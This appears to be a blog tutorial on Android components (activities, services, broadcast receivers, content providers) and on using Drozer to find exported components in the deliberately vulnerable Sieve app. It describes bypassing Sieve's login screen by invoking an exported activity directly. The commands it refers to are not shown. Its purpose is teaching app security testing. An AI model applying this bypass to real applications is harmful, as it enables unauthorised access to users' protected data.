Android applications communicate with each other using an IPC (Inter-Process Communication) kernel module known as binder. The applications can make use of four components that can be invoked via calls to binder.
Android Components
- Activities - An activity represents a single screen with a user interface. An example of an activity would be a login page.
- Services - A service is a component that runs in the background to perform long-running operations, it does not provide a UI. An example of a service might be music playing in the background while the user is in a different application.
- Broadcast Receivers - A broadcast receiver is a component that responds to system-wide broadcast announcements. A broadcast may announce that the battery is low or a picture was captured. Apps can also initiate broadcasts - for example to let other apps know that some data has been downloaded to the device and is available for them to use.
- Content Providers - A content provider supplies data from one application to others on request. You can store data in the file system, an SQLite database or any other persistent storage location the app can access.
Defining Components
Each Android Package contains a file named AndroidManifest.xml. This file contains various information such as the minimum Android version and the list of activities, services, broadcast receivers and content providers. Only components defined in the manifest file are usable within the application, the one exception are broadcast receivers.
One of the important aspects of securing components in the manifest is to use strongly configured permissions.
In Android a component is public when exported is set to true but it is also public if the manifest specifies an intent filter for it.
Attacking Components
In this tutorial we will use Drozer to analyze an Android application to determine what components are exported and if so how they can be attacked.
We will use a deliberately vulnerable Android application created by MWR InfoSecurity called Sieve . Sieve is a password manager that allows a user to save passwords and makes use of a master password and pin to encrypt the passwords in the database.
Analyzing the Manifest File
After you install the application you can find the package name of the application by running the command below
Drozer allows for examination of the manifest file, the command below returns the whole manifest file
An easier way to check for exported components is to run the command below. We can see that there are 3 activities,2 content providers and 2 services exported.
Exploiting Activities
As mentioned earlier activities are individual user interfaces. Developers need to be careful when defining the activities to be exported in the manifest file. The Sieve application demonstrates how the application authentication page can be bypassed due to a misconfigured activity.
We have determined that 3 activities have been exported, run the command below to identify the pages.
When a user opens the Sieve application they must enter a master password and pin via the authentication page. We can try to bypass this page (MainLoginActivity) by calling one of the other activities. We can try to invoke the other activities using drozer.
By invoking this activity we have bypassed the authentication page without having to enter a password or pin.
No comments:
Post a Comment